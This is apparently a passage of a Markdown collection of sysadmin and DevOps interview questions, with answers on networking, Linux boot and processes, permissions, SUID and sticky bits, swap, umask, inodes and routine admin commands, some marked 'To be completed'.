The **OSI** model explains why it doesn't make sense to make routing decisions, a **layer 3** concept, based on a physical, **layer 2**, mechanism. Modern networking is broken into many different layers to accomplish your end-to-end communication. Your network card (what is addressed by the MAC address - the physical address) only needs to be responsible for communicating with peers on its physical network.

The communication that you can accomplish with your **MAC** address is limited to other devices that reside on the same physical network as your machine. On the internet, for example, you are not physically connected to each machine. That's why we make use of the **TCP/IP** (a **layer 3**, logical address) mechanism when we need to communicate with a machine that we are not physically connected to.

**IP** is an arbitrary numbering scheme imposed in a hierarchical fashion on a group of computers to logically distinguish them as a group (that's what a subnet is). Sending messages between those groups is done by routing tables, themselves divided into multiple levels so that we don't have to keep track of every single subnet.

It's also pretty easy to relate this to another pair of systems. You have a State Issued ID Number, so why would you need a mailing address if that ID number is already unique to just you? You need the mailing address because it's an arbitrary system that describes where the unique destination for communications to you should go.

On the other hand, the distribution of **MAC** addresses across the network is random and completely unrelated to topology. Grouping routes would be impossible; every router would need to keep track of routes for every single device that relays traffic through it. That is what **layer 2** switches do, and that does not scale well beyond a certain number of hosts.

Useful resources:

- [Why couldn't MAC addresses be used instead of IPv4|6 for networking? (original)](https://serverfault.com/questions/410626/why-couldnt-mac-addresses-be-used-instead-of-ipv46-for-networking)

</details>

<details>
<summary><b>What is the smallest IPv4 subnet mask that can be applied to a network containing up to 30 devices?</b></summary><br>

Whether you have a standard `/24` VLAN for end users, a `/30` for point-to-point links, or something in between, a subnet that must contain up to 30 devices works out to be a `/27`, or a subnet mask of `255.255.255.224`. A `/27` leaves 5 host bits: 2^5 = 32 addresses, minus the network and broadcast addresses, gives 30 usable hosts.
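You can verify the arithmetic with the `ipcalc` utility (assuming it is installed; output format differs between implementations, and 192.168.10.0 is just an example network):

```bash
# /27 leaves 32 - 27 = 5 host bits: 2^5 = 32 addresses, 30 usable hosts
ipcalc 192.168.10.0/27
# Typical output includes:
#   Netmask:   255.255.255.224 = 27
#   HostMin:   192.168.10.1
#   HostMax:   192.168.10.30
#   Hosts/Net: 30
```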
Useful resources:

- [How do you calculate the prefix, network, subnet, and host numbers?](https://networkengineering.stackexchange.com/questions/7106/how-do-you-calculate-the-prefix-network-subnet-and-host-numbers)
- [The slash after an IP Address - CIDR Notation](https://networkengineering.stackexchange.com/questions/3697/the-slash-after-an-ip-address-cidr-notation)
- [Why are there 3 ranges of private IPv4 addresses?](https://networkengineering.stackexchange.com/questions/32119/why-are-there-3-ranges-of-private-ipv4-addresses)
- [IP Calculator](http://jodies.de/ipcalc)

</details>

<details>
<summary><b>What are some common HTTP status codes?</b></summary><br>

- **1xx** - Informational responses - communicate transfer protocol-level information
- **2xx** - Success - indicates that the client's request was accepted successfully
- **3xx** - Redirection - indicates that the client must take some additional action in order to complete the request
- **4xx** - Client side error - this category of error status codes points the finger at clients
- **5xx** - Server side error - the server takes responsibility for these error status codes

Useful resources:

- [HTTP Status Codes](https://httpstatuses.com/)

</details>

###### Devops Questions (5)

<details>
<summary><b>What is DevOps? Which is more important to the success of any DevOps community: how people communicate or the tools that you choose to deploy? ***</b></summary><br>

**DevOps** is a cohesive team that engages in both Development and Operations tasks, or it's individual Operations and Development teams that work very closely together. It's more of a "way" of working collaboratively with other departments to achieve common goals.

</details>

<details>
<summary><b>What is version control? Are your commit messages good looking?</b></summary><br>

It is a system that records changes to a file or set of files over time so that you can recall specific versions later. Version control systems consist of a central shared repository where teammates can commit changes to a file or set of files. Then you can mention the uses of version control.

Version control allows you to:

- revert files back to a previous state
- revert the entire project back to a previous state
- compare changes over time
- see who last modified something that might be causing a problem
- see who introduced an issue and when

The seven rules of a great commit message:

- separate subject from body with a blank line
- limit the subject line to 50 characters
- capitalize the subject line
- do not end the subject line with a period
- use the imperative mood in the subject line
- wrap the body at 72 characters
- use the body to explain what and why vs. how
Useful resources:

- [Getting Started - About Version Control (original)](https://git-scm.com/book/en/v2/Getting-Started-About-Version-Control)

</details>

<details>
<summary><b>Explain some basic <code>git</code> commands.</b></summary><br>

- `git init` - create a new local repository
- `git commit -m "message"` - commit changes to head
- `git status` - list the files you've added with `git add` and also the files you've changed since then
- `git push origin master` - send changes to the master branch of your remote repository

</details>

<details>
<summary><b>Explain a simple Continuous Integration pipeline.</b></summary><br>

- clone the repository
- deploy to the staging environment (QA)
- run tests in the testing environment (QA)
- deploy to production (PROD)

</details>

<details>
<summary><b>Explain some basic <code>docker</code> commands.</b></summary><br>

- `docker ps` - show running containers
- `docker ps -a` - show all containers
- `docker images` - show docker images
- `docker logs <container-id|container-name>` - get logs from a container
- `docker network ls` - show all docker networks
- `docker volume ls` - show all docker volumes
- `docker exec -it <container-id|container-name> bash` - execute bash in a container with an interactive shell

</details>

###### Cyber Security Questions (1)

<details>
<summary><b>What is a Security Misconfiguration?</b></summary><br>

**Security misconfiguration** is a vulnerability that occurs when a device/application/network is configured in a way which can be exploited by an attacker. This can be as simple as leaving the default username/password unchanged, or using passwords that are too simple for device accounts, etc.

</details>

### :diamond_shape_with_a_dot_inside: <a name="regular-sysadmin">Regular Sysadmin</a>

###### System Questions (60)

<details>
<summary><b>Tell me about your experience with the production environments? ***</b></summary><br>

To be completed.

</details>

<details>
<summary><b>Which distribution would you select for running a major web server? ***</b></summary><br>

To be completed.

</details>

<details>
<summary><b>Explain in a few points the boot process of the Linux system.</b></summary><br>

**BIOS**: BIOS stands for Basic Input/Output System. It performs integrity checks and then searches for, loads, and executes the bootloader.

**Bootloader**: Since the earlier phases are not specific to the operating system, the BIOS-based boot process for x86 and x86-64 architectures is considered to start when the master boot record (MBR) code is executed in real mode and the first-stage boot loader is loaded. In UEFI systems, a payload, such as the Linux kernel, can be executed directly, thus no boot loader is necessary. Some popular bootloaders: **GRUB**, **Syslinux/Isolinux** or **Lilo**.

**Kernel**: The kernel in Linux handles all operating system processes, such as memory management, task scheduling, I/O, interprocess communication, and overall system control. This is loaded in two stages - in the first stage, the kernel (as a compressed image file) is loaded into memory and decompressed, and a few fundamental functions such as basic memory management are set up.

**Init**: Is the parent of all processes on the system; it is executed by the kernel and is responsible for starting all other processes.

- `SysV init` - init's job is "to get everything running the way it should be" once the kernel is fully running. Essentially it establishes and operates the entire user space.
This includes checking and mounting file systems, starting up necessary user services, and ultimately switching to a user environment when system startup is completed.
- `systemd` - the developers of systemd aimed to replace the Linux init system inherited from Unix System V. Like init, systemd is a daemon that manages other daemons. All daemons, including systemd, are background processes. Systemd is the first daemon to start (during booting) and the last daemon to terminate (during shutdown).
- `runit` - runit is an init scheme for Unix-like operating systems that initializes, supervises, and ends processes throughout the operating system. It is a reimplementation of the daemontools process supervision toolkit that runs on the Linux, Mac OS X, \*BSD, and Solaris operating systems.

Useful resources:

- [Analyzing the Linux boot process](https://opensource.com/article/18/1/analyzing-linux-boot-process)
- [Systemd Boot Process a Close Look in Linux](https://linoxide.com/linux-how-to/systemd-boot-process/)

</details>

<details>
<summary><b>How and why do Linux daemons drop privileges? Why do some daemons need root permissions to start? Explain. ***</b></summary>

To be completed.

</details>

<details>
<summary><b>Why is a load of 1.00 not ideal on a single-core machine?</b></summary><br>

The problem with a load of 1.00 is that you have no headroom. In practice, many sysadmins will draw a line at 0.70.

The "Need to Look into it" Rule of Thumb: 0.70. If your load average is staying above 0.70, it's time to investigate before things get worse.

The "Fix this now" Rule of Thumb: 1.00. If your load average stays above 1.00, find the problem and fix it now. Otherwise, you're going to get woken up in the middle of the night, and it's not going to be fun.

Rule of Thumb: 5.0. If your load average is above 5.00, you could be in serious trouble. Your box is either hanging or slowing way down, and this will (inexplicably) happen at the worst possible time, like in the middle of the night or when you're presenting at a conference. Don't let it get there.

Useful resources:

- [Proper way of interpreting system load on a 4 core 8 thread processor](https://serverfault.com/questions/618130/proper-way-of-interpreting-system-load-on-a-4-core-8-thread-processor)
- [Understanding Linux CPU Load - when should you be worried?](http://blog.scoutapp.com/articles/2009/07/31/understanding-load-averages)

</details>

<details>
<summary><b>What does it mean when the effective user is root, but the real user ID is still your name?</b></summary><br>

The **real user ID** is who you really are (the user who owns the process), and the **effective user ID** is what the operating system looks at to make a decision whether or not you are allowed to do something (most of the time; there are some exceptions).

When you log in, the login shell sets both the **real and effective user ID** to the same value (your **real user ID**) as supplied by the password file.

If you execute a setuid program, it runs as another user (e.g. **root**) while still doing something on your behalf: the process keeps your **real ID** (since you're the process owner) but gets the effective user ID of the file owner (for example **root**), since the file is setuid.

Let's use the case of `passwd`:

```bash
-rwsr-xr-x 1 root root 45396 may 25 2012 /usr/bin/passwd
```

When user2 wants to change their password, they execute `/usr/bin/passwd`. The **RUID** will be user2 but the **EUID** of that process will be root.
user2 can use passwd only to change their own password, because internally passwd checks the **RUID** and, if it is not root, its actions will be limited to the real user's password. It's necessary that the **EUID** becomes root in the case of passwd because the process needs to write to `/etc/passwd` and/or `/etc/shadow`.

Useful resources:

- [Difference between Real User ID, Effective User ID and Saved User ID? (original)](https://stackoverflow.com/questions/30493424/what-is-the-difference-between-a-process-pid-ppid-uid-euid-gid-and-egid)
- [What is the difference between a pid, ppid, uid, euid, gid and egid?](https://stackoverflow.com/questions/30493424/what-is-the-difference-between-a-process-pid-ppid-uid-euid-gid-and-egid)

</details>

<details>
<summary><b>A developer added a cron job which generates massive log files. How do you prevent them from getting so big?</b></summary><br>

Using `logrotate` is the usual way of dealing with logfiles. But instead of adding content to `/etc/logrotate.conf` you should add your own job to `/etc/logrotate.d/`, otherwise you would have to look at more diffs of configuration files during release upgrades.

If the file is actively being written to, you can't simply delete it (the process keeps its file handle open); your best option is to truncate the file in place:

```bash
: >/var/log/massive-logfile
```

This is very helpful, because it truncates the file without disrupting the processes writing to it.

Useful resources:

- [How to Use logrotate to Manage Log Files](https://www.linode.com/docs/uptime/logs/use-logrotate-to-manage-log-files/)
- [System logging](https://www.ibm.com/developerworks/library/l-lpic1-108-2/index.html)

</details>

<details>
<summary><b>How does the Linux kernel create, manage and delete the processes in the system? ***</b></summary><br>

To be completed.

Useful resources:

- [Linux Processes](https://www.tldp.org/LDP/tlk/kernel/processes.html)

</details>

<details>
<summary><b>Explain the selected information you can see in <code>top</code> and <code>htop</code>. How to diagnose load, high user time and out-of-memory problems with these tools? ***</b></summary><br>

To be completed.

Useful resources:

- [top explained visually](https://www.svennd.be/top-explained-visually/)
- [htop Explained Visually](https://codeahoy.com/2017/01/20/hhtop-explained-visually/)
- [Explanation of everything you can see in htop/top on Linux](https://peteris.rocks/blog/htop/)

</details>

<details>
<summary><b>How would you recognize a process that is hogging resources?</b></summary><br>

`top` works reasonably well, as long as you look at the right numbers:

- **M** - sorts by current resident memory usage
- **T** - sorts by total (or cumulative) CPU usage
- **P** - sorts by current CPU usage (this is the default refresh)
- **?** - displays a usage summary for all top commands

This is very important information to obtain when working out why a process is running slowly and deciding what processes to kill or which software to uninstall.

Useful resources:

- [How to find the process(es) which are hogging the machine](https://superuser.com/questions/326300/how-to-find-the-processes-which-are-hogging-the-machine)

</details>

<details>
<summary><b>You need to upgrade the <code>ntpd</code> service on 200 servers. What is the best way to go about upgrading all of these to the latest version?</b></summary><br>

By using the **Infrastructure as Code** approach, there are multiple good ways:
1. **Configuration Synchronization Change Management Model**: there are configuration management tools (Ansible, Chef, Puppet, SaltStack, ...) that can be used to automatically update the `ntpd` service on all servers. To keep systems stable, system packages on servers are usually auto-updated with security updates only. Major or minor versions of packages are usually version-locked in configuration definitions to prevent misconfiguration of the service. The change is then deployed by changing the `ntpd` version in the configuration definition. With this approach, it is important to be careful when deploying changes across the infrastructure massively. The deployment pipeline should include unit, integration and system tests, and the change should first be deployed into a staging environment to prove the configuration. If the tests prove the configuration correct, deployment should be done as an incremental rollout with the ability to roll back in case of errors or failures.

2. **Immutable Servers Model**: in the immutable server model, the whole unit (server, container) is replaced by a new, updated image rather than making changes to a running server (this eliminates configuration drift). With this approach you usually build the server image with tools like Packer, or Docker with a Dockerfile. This image is then tested and deployed similarly to option 1, but now using techniques such as Canary Release, which also allows incremental rollout and rollback.

Useful resources:

- [Infrastructure as Code - Chapter 8: Patterns for Updating and Changing Servers](http://shop.oreilly.com/product/0636920039297.do)

</details>

<details>
<summary><b>How to permanently set <code>$PATH</code> on Linux/Unix? Why is this variable so important? ***</b></summary>

To be completed.

</details>

<details>
<summary><b>When your server is booting up, some errors appear on the console. How to examine boot messages and where are they stored?</b></summary><br>

Your console has two types of messages:

- **generated by the kernel** (via printk)
- **generated by userspace** (usually your init system)

Kernel messages are always stored in the **kmsg** buffer, visible via the `dmesg` command. They're also often copied to your **syslog**. This also applies to userspace messages written to `/dev/kmsg`, but those are fairly rare. Meanwhile, when userspace writes its fancy boot status text to `/dev/console` or `/dev/tty1`, it's not stored anywhere at all. It just goes to the screen and that's it.

`dmesg` is used to review boot messages contained in the kernel ring buffer. A ring buffer is a buffer of fixed size for which any new data added to it overwrites the oldest data in it. It shows operations once the boot process has completed, such as command line options passed to the kernel, hardware components detected, events when a new USB device is added, or errors like NIC (Network Interface Card) failure where the drivers report no link activity detected on the network, and much more.

If system logging is done via the journal component, you should use `journalctl`. It shows messages including kernel and boot messages, and messages from syslog or various services.
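For example (a minimal sketch; `-b -1` assumes the journal is configured to persist across reboots):

```bash
# Kernel ring buffer (boot-time kernel messages)
dmesg | less

# Journal messages from the current boot only
journalctl -b

# Errors (and worse) from the previous boot
journalctl -b -1 -p err
```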
Boot issues/errors call for a system administrator to look into certain important files, in conjunction with particular commands (handled differently by different versions of Linux):

- `/var/log/boot.log` - system boot log, it contains everything that unfolded during the system boot
- `/var/log/messages` - stores global system messages, including the messages that are logged during system boot
- `/var/log/dmesg` - contains kernel ring buffer information

Useful resources:

- [How to view all boot messages in Linux after booting? (original)](https://superuser.com/questions/1188407/how-to-view-all-boot-messages-in-linux-after-booting)
- [Differences in /var/log/{syslog,dmesg,messages} log files](https://superuser.com/questions/565927/differences-in-var-log-syslog-dmesg-messages-log-files)
- [How can the messages that scroll by when booting a Debian system be reviewed later?](https://serverfault.com/questions/516411/all-debian-boot-messages)

</details>

<details>
<summary><b>Swap usage is too high. What are the reasons for this and how to resolve swapping problems?</b></summary><br>

**Swap** space is a portion of disk storage that is used by the operating system when available physical memory has been fully utilized. It is a memory-management technique that involves swapping sections of memory to and from physical storage. If the system needs more memory resources and the RAM is full, inactive pages in memory are moved to the swap space. While swap space can help machines with a small amount of RAM, it should not be considered a replacement for more RAM. Swap space is located on hard drives, which have a slower access time than physical memory.

Usage of the entire swap space indicates that your workload demands more memory than you have. Also, changing `swappiness` to **1** might not be a wise decision. Setting `swappiness` to **1** does not mean that swapping will not be done; it only controls how aggressive the kernel is about swapping, it does not eliminate it. Swapping will happen if it needs to be done.

- **Increasing the size of the swap space** - firstly, you'd have increased disk use. If your disks aren't fast enough to keep up, then your system might end up thrashing, and you'd experience slowdowns as data is swapped in and out of memory. This would result in a bottleneck.
- **Adding more RAM** - the real solution is to add more memory. There's no substitute for RAM, and if you have enough memory, you'll swap less.
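To inspect and tune the swappiness mentioned above (a minimal sketch; the value `10` is just an illustrative choice):

```bash
# Show the current value (the default is usually 60)
cat /proc/sys/vm/swappiness

# Lower it for the running system
sysctl vm.swappiness=10

# Persist the change across reboots
echo 'vm.swappiness = 10' >> /etc/sysctl.conf
```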
For monitoring swap space usage:

- `cat /proc/swaps` - to see total and used swap size
- `grep SwapTotal /proc/meminfo` - to show total swap space
- `free` - to display the amount of free and used system memory (including swap)
- `vmstat` - to check swapping statistics
- `top`, `htop` - to check swap space usage
- `atop` - to show whether your system is overcommitting memory
- or use a one-liner shell command to list all applications with how much swap space each is using, in kilobytes:

```bash
for _fd in /proc/*/status ; do
  awk '/VmSwap|Name/{printf $2 " " $3}END{ print ""}' $_fd
done | sort -k 2 -n -r | less
```

Useful resources:

- [Linux ate my ram!](https://www.linuxatemyram.com/)
- [How to find out which processes are using swap space in Linux?](https://stackoverflow.com/questions/479953/how-to-find-out-which-processes-are-using-swap-space-in-linux)
- [8 Useful Commands to Monitor Swap Space Usage in Linux](https://www.tecmint.com/commands-to-monitor-swap-space-usage-in-linux/)
- [What is the danger in having a fully used SWAP in an Ubuntu server?](https://serverfault.com/questions/499301/what-is-the-danger-in-having-a-fully-used-swap-in-an-ubuntu-server)
- [How to empty swap if there is free RAM?](https://askubuntu.com/questions/1357/how-to-empty-swap-if-there-is-free-ram)

</details>

<details>
<summary><b>What is umask? How to set it permanently for a user?</b></summary><br>

On Linux and other Unix-like operating systems, new files are created with a default set of permissions. Specifically, a new file's permissions may be restricted in a specific way by applying a permissions "mask" called the `umask`. The `umask` command is used to set this mask, or to show you its current value.

To change it permanently (set e.g. `umask 02`), add it to one of:

- `~/.profile`
- `~/.bashrc`
- `~/.zshrc`
- `~/.cshrc`

Useful resources:

- [What is Umask and How To Setup Default umask Under Linux?](https://www.cyberciti.biz/tips/understanding-linux-unix-umask-value-usage.html)

</details>

<details>
<summary><b>Explain the differences among the following umask values: 000, 002, 022, 027, 077, and 277.</b></summary><br>

<table style="width:100%">
  <tr>
    <th>Umask</th>
    <th>File result</th>
    <th>Directory result</th>
  </tr>
  <tr>
    <td>000</td>
    <td>666 rw- rw- rw-</td>
    <td>777 rwx rwx rwx</td>
  </tr>
  <tr>
    <td>002</td>
    <td>664 rw- rw- r--</td>
    <td>775 rwx rwx r-x</td>
  </tr>
  <tr>
    <td>022</td>
    <td>644 rw- r-- r--</td>
    <td>755 rwx r-x r-x</td>
  </tr>
  <tr>
    <td>027</td>
    <td>640 rw- r-- ---</td>
    <td>750 rwx r-x ---</td>
  </tr>
  <tr>
    <td>077</td>
    <td>600 rw- --- ---</td>
    <td>700 rwx --- ---</td>
  </tr>
  <tr>
    <td>277</td>
    <td>400 r-- --- ---</td>
    <td>500 r-x --- ---</td>
  </tr>
</table>

Useful resources:

- [What is Umask and How To Setup Default umask Under Linux?](https://www.cyberciti.biz/tips/understanding-linux-unix-umask-value-usage.html)

</details>

<details>
<summary><b>What is the difference between a symbolic link and a hard link?</b></summary><br>

Underneath the file system, files are represented by inodes:

- a file in the file system is basically a link to an inode
- a hard link then just creates another file with a link to the same underlying inode
- a symbolic link is a link to another name in the file system

When you delete a file, it removes one link to the underlying inode. The inode is only deleted (or deletable/over-writable) when all links to the inode have been deleted.

Once a hard link has been made, the link is to the inode;
deleting, renaming, or moving the original file will not affect the hard link, as it links to the underlying inode. Any changes to the data on the inode are reflected in all files that refer to that inode.

Note: hard links are only valid within the same file system. Symbolic links can span file systems, as they are simply the name of another file.

Differences:

- a **hard link** cannot be created for directories; it can only be created for a file
- a **soft link**, also termed a symbolic link or symlink, can link to a directory

Useful resources:

- [What is the difference between a hard link and a symbolic link?](https://medium.com/@wendymayorgasegura/what-is-the-difference-between-a-hard-link-and-a-symbolic-link-8c0493041b62)

</details>

<details>
<summary><b>How does the sticky bit work? Is <code>SUID/SGID</code> the same thing?</b></summary><br>

This is probably one of my most irksome things that people mess up all the time. The **SUID/SGID** bit and the **sticky bit** are 2 completely different things.

If you do a `man chmod` you can read about the **SUID** and **sticky bits**.

**SUID/SGID**

What the `chmod` man page is trying to say is that the position that the x bit takes in the rwxrwxrwx for the user octal (1st group of rwx) and the group octal (2nd group of rwx) can take an additional state where the x becomes an s. When this occurs, this file, when executed (if it's a program and not just a shell script), will run with the permissions of the owner or the group of the file.

So if the file is owned by root and the **SUID** bit is turned on, the program will run as root, even if you execute it as a regular user. The same thing applies to the **SGID** bit.

Examples:

**no suid/sgid** - just the bits `rwxr-xr-x` are set:

```bash
ls -lt b.pl
-rwxr-xr-x 1 root root 179 Jan 9 01:01 b.pl
```

**suid & user's executable bit enabled (lowercase s)** - the bits `rwsr-xr-x` are set:

```bash
chmod u+s b.pl
ls -lt b.pl
-rwsr-xr-x 1 root root 179 Jan 9 01:01 b.pl
```

**suid enabled & executable bit disabled (uppercase S)** - the bits `rwSr-xr-x` are set:

```bash
chmod u-x b.pl
ls -lt b.pl
-rwSr-xr-x 1 root root 179 Jan 9 01:01 b.pl
```

**sgid & group's executable bit enabled (lowercase s)** - the bits `rwxr-sr-x` are set:

```bash
chmod g+s b.pl
ls -lt b.pl
-rwxr-sr-x 1 root root 179 Jan 9 01:01 b.pl
```

**sgid enabled & executable bit disabled (uppercase S)** - the bits `rwxr-Sr-x` are set:

```bash
chmod g-x b.pl
ls -lt b.pl
-rwxr-Sr-x 1 root root 179 Jan 9 01:01 b.pl
```

**sticky bit**

The sticky bit, on the other hand, is denoted as `t`, such as with the `/tmp` directory:

```bash
ls -l / | grep tmp
drwxrwxrwt. 168 root root 28672 Jun 14 08:36 tmp
```

This bit should have always been called the _restricted deletion bit_ given that's what it really connotes. When this mode bit is enabled, it makes a directory such that users can only delete files & directories within it that they are the owners of.

Useful resources:

- [How does the sticky bit work? (original)](https://unix.stackexchange.com/questions/79395/how-does-the-sticky-bit-work)

</details>

<details>
<summary><b>What does <code>LC_ALL=C</code> before a command do? In what cases will it be useful?</b></summary><br>

`LC_ALL` is the environment variable that overrides all the other localisation settings. It sets all `LC_` type variables at once to a specified locale.

The main reason to set `LC_ALL=C` before a command is simply to get English output (in general, to change the locale used by the command).
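For example (a minimal sketch; the German locale name is illustrative and availability depends on which locales are generated on your system):

```bash
# Localized output
LC_ALL=de_DE.utf8 date +%A
Montag

# Plain English output, regardless of the system locale
LC_ALL=C date +%A
Monday
```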
On the other hand, `LC_ALL=C` is also important for increasing the speed of command execution, e.g. for `grep` or `fgrep`. Using the `LC_ALL=C` locale can bring command execution time down considerably. For example, if you set `LC_ALL=en_US.utf8`, the system opens multiple files from the `/usr/lib/locale` directory; with `LC_ALL=C`, a minimal number of open and read operations is performed.

If you want to restore all your normal (original) locale settings for the session:

```bash
LC_ALL=
```

If `LC_ALL` does not work, try using `LANG` (if that still does not work, try `LANGUAGE`):

```bash
LANG=C date +%A
Monday
```

Useful resources:

- [What does LC_ALL=C do? (original)](https://unix.stackexchange.com/questions/87745/what-does-lc-all-c-do)
- [Speed up grep searches with LC_ALL=C](https://www.inmotionhosting.com/support/website/ssh/speed-up-grep-searches-with-lc-all)

</details>

<details>
<summary><b>How to make high availability of web application? ***</b></summary>

To be completed.

</details>

<details>
<summary><b>You are configuring a new server. One of the steps is setting the permissions to the app directories. What steps will you take and what mistakes should you avoid?</b></summary><br>

**1) Main requirements - remember these**

- which users have access to the app filesystem
- permissions for web servers, e.g. Apache, and app servers, e.g. uwsgi
- permissions for specific directories like **uploads** and **cache**, and for the main app directory, e.g. `/var/www/app01/html`
- correct `umask` value for users and **suid**/**sgid** (only for specific situations)
- permissions for all future files and directories
- permissions for cron jobs and scripts

**2) Application directories**

`/var/www` contains a directory for each website (isolation of the apps), e.g. `/var/www/app01`, `/var/www/app02`:

```bash
mkdir /var/www/{app01,app02}
```

**3) Application owner and group**

Each application has a designated **owner** (e.g. **u01-prod**, **u02-prod**) and **group** (e.g. **g01-prod**, **g02-prod**) which are set as the owner of all files and directories in the website's directory:

```bash
chown -R u01-prod:g01-prod /var/www/app01
chown -R u02-prod:g02-prod /var/www/app02
```

**4) Developers owner and group**

All of the users that maintain the website have their own groups and are attached to the application group:

```bash
id alice
uid=2000(alice) gid=4000(alice) groups=8000(g01-prod)

id bob
uid=2001(bob) gid=4001(bob) groups=8000(g01-prod),8001(g02-prod)
```

So the **alice** user has standard privileges for `/var/www/app01`, and the **bob** user has standard privileges for `/var/www/app01` and `/var/www/app02`.

**5) Web server owner and group**

Any files or directories that need to be written by the web server have their own owner. If the web server is Apache, the default owner/group is **apache:apache** or **www-data:www-data**; for Nginx it will be **nginx:nginx**. Don't change these settings.

If an application works with app servers like **uwsgi** or **php-fpm**, you should set the appropriate user and group (e.g. for **app01** it will be **u01-prod:g01-prod**) in the specific config files, as in the sketch below.
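A minimal sketch of such a setting for a php-fpm pool (the file path, pool name and socket path are illustrative):

```bash
; /etc/php-fpm.d/app01.conf
[app01]
; run the pool workers as the application owner/group
user = u01-prod
group = g01-prod
; let the web server user talk to the socket
listen = /run/php-fpm/app01.sock
listen.owner = nginx
listen.group = nginx
```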
**6) Permissions**

Set proper permissions with **Access Control Lists**:

```bash
# For the web server
setfacl -Rdm "g:apache:rwx" /var/www/app01
setfacl -Rm "g:apache:rwx" /var/www/app01

# For developers
setfacl -Rdm "g:g01-prod:rwx" /var/www/app01
setfacl -Rm "g:g01-prod:rwx" /var/www/app01
```

If you use **SELinux**, remember the security context:

```bash
chcon -R system_u:object_r:httpd_sys_content_t /var/www/app01
```

**7) Security mistakes**

- **root** owner for files and directories - **root** never executes any files in the website directory, and shouldn't be creating files in there
- too wide permissions, like **777**, so that some critical files may be world-writable and world-readable
- avoid creating maintenance scripts or other critical files with suid root

If you allow your site to modify the files which form the code running your site, you make it much easier for someone to take over your server. A file upload tool allows users to upload a file with any name and any contents. This allows a user to upload a mail relay PHP script to your site, which they can place wherever they want to turn your server into a machine to forward unsolicited commercial email. This script could also be used to read every email address out of your database, or other personal information.

If the malicious user can upload a file with any name but not control the contents, then they could easily upload a file which overwrites your `index.php` (or another critical file) and breaks your site.

Useful resources:

- [How to setup linux permissions for the WWW folder?](https://serverfault.com/questions/124800/how-to-setup-linux-permissions-for-the-www-folder)
- [What permissions should my website files/folders have on a Linux webserver?](https://serverfault.com/questions/357108/what-permissions-should-my-website-files-folders-have-on-a-linux-webserver)
- [Security Pitfalls of setgid Programs](https://www.agwa.name/blog/post/security_pitfalls_of_setgid_programs)

</details>

<details>
<summary><b>What steps will be taken by init when you run <code>telinit 1</code> from run level 3? What will be the final result of this? If you use <code>telinit 6</code> instead of the <code>reboot</code> command, will your server be restarted? ***</b></summary><br>

To be completed.

Useful resources:

- [What differences it will make, if i use "telinit 6" instead of "reboot" command to restart my computer?](https://unix.stackexchange.com/questions/434560/what-differences-it-will-make-if-i-use-telinit-6-instead-of-reboot-command)

</details>

<details>
<summary><b>I have forgotten the root password! What do I do in BSD? What is the purpose of booting into single user mode?</b></summary><br>

Restart the system and type `boot -s` at the `Boot:` prompt to enter **single-user mode**. At the question about the shell to use, hit `Enter`, which will display a `#` prompt. Enter `mount -urw /` to remount the root file system read/write, then run `mount -a` to remount all the file systems. Run `passwd root` to change the root password, then run `exit` to continue booting.

**Single-user mode** basically lets you log in with root access and change just about anything. For example, you might use single-user mode when you are restoring a damaged master database or a system database, or when you are changing server configuration options (e.g. password recovery).
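As a recap, the whole FreeBSD sequence at the single-user `#` prompt looks like this:

```bash
mount -urw /   # remount the root file system read/write
mount -a       # mount the remaining file systems
passwd root    # set a new root password
exit           # continue booting into multi-user mode
```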
Useful resources:

- [FreeBSD Reset or Recover Root Password](https://www.cyberciti.biz/tips/howto-freebsd-reset-recover-root-password.html)
- [Single User Mode Definition](http://www.linfo.org/single_user_mode.html)

</details>

<details>
<summary><b>How could you modify a text file without invoking a text editor?</b></summary><br>

For example:

```bash
# cat >filename ... - overwrite file
# cat >>filename ... - append to file
cat > filename << __EOF__
data
__EOF__
```

</details>

<details>
<summary><b>How to change the kernel parameters? What kernel options might you need to tune? ***</b></summary><br>

To set kernel parameters on Unix-like systems, first edit the file `/etc/sysctl.conf`. After making the changes, save the file and run the `sysctl -p` command; this applies the changes permanently, without rebooting the machine.

Useful resources:

- [How to Change Kernel Runtime Parameters in a Persistent and Non-Persistent Way](https://www.tecmint.com/change-modify-linux-kernel-runtime-parameters/)

</details>

<details>
<summary><b>Explain the <code>/proc</code> filesystem.</b></summary><br>

`/proc` is a virtual file system that provides detailed information about the kernel, hardware and running processes. Since `/proc` contains virtual files, it is called a virtual file system. These virtual files have unique qualities; most of them are listed as zero bytes in size.

Virtual files such as `/proc/interrupts`, `/proc/meminfo`, `/proc/mounts` and `/proc/partitions` provide an up-to-the-moment glimpse of the system's hardware. Others, like the `/proc/filesystems` file and the `/proc/sys/` directory, provide system configuration information and interfaces.

Useful resources:

- [Linux Filesystem Hierarchy - /proc](https://www.tldp.org/LDP/Linux-Filesystem-Hierarchy/html/proc.html)

</details>

<details>
<summary><b>Describe your data backup process. How often should you test your backups? ***</b></summary><br>

To be completed.

</details>

<details>
<summary><b>Explain three types of journaling in ext3/ext4.</b></summary><br>

There are three types of journaling available in **ext3/ext4** file systems:

- **Journal** - metadata and content are saved in the journal
- **Ordered** - only metadata is saved in the journal. Metadata is journaled only after writing the content to disk. This is the default
- **Writeback** - only metadata is saved in the journal. Metadata might be journaled either before or after the content is written to the disk

</details>

<details>
<summary><b>What is an inode? How to find a file's inode number and how can you use it?</b></summary><br>

An **inode** is a data structure on a filesystem on Linux and other Unix-like operating systems that stores all the information about a file except its name and its actual data. A data structure is a way of storing data so that it can be used efficiently.

A Unix file is stored in two different parts of the disk - the data blocks and the inodes (I won't get into superblocks and other esoteric information). The data blocks contain the "contents" of the file; the information about the file is stored elsewhere - in the inode.

A file's inode number can easily be found by using the `ls` command, which by default lists the objects (i.e. files, links and directories) in the current directory (i.e. the directory in which the user is currently working), with its `-i` option.
Thus, for example, the following will show the name of each object in the current directory together with its inode number:

```bash
ls -i
```

`df`'s `-i` option instructs it to supply information about inodes on each filesystem rather than about available space. Specifically, it tells df to return, for each mounted filesystem, the total number of inodes, the number of free inodes, the number of used inodes and the percentage of inodes used. This option can be used together with the `-h` option as follows to make the output easier to read:

```bash
df -hi
```

**Finding files by inodes**

If you know the inode, you can find it using the find command:

```bash
find . -inum 435304 -print
```

**Deleting files with strange names**

Sometimes files are created with strange characters in the filename. The Unix file system will allow any character as part of a filename except for a null (ASCII 000) or a "/". Every other character is allowed. Users can create files with characters that make it difficult to see the directory or file. They can create the directory ".. " with a space at the end, or create a file that has a backspace in the name, using:

```bash
touch `printf "aa\bb"`
```

Now watch what happens when you use the `ls` command:

```bash
ls
aa?b
ls | grep 'a'
ab
```

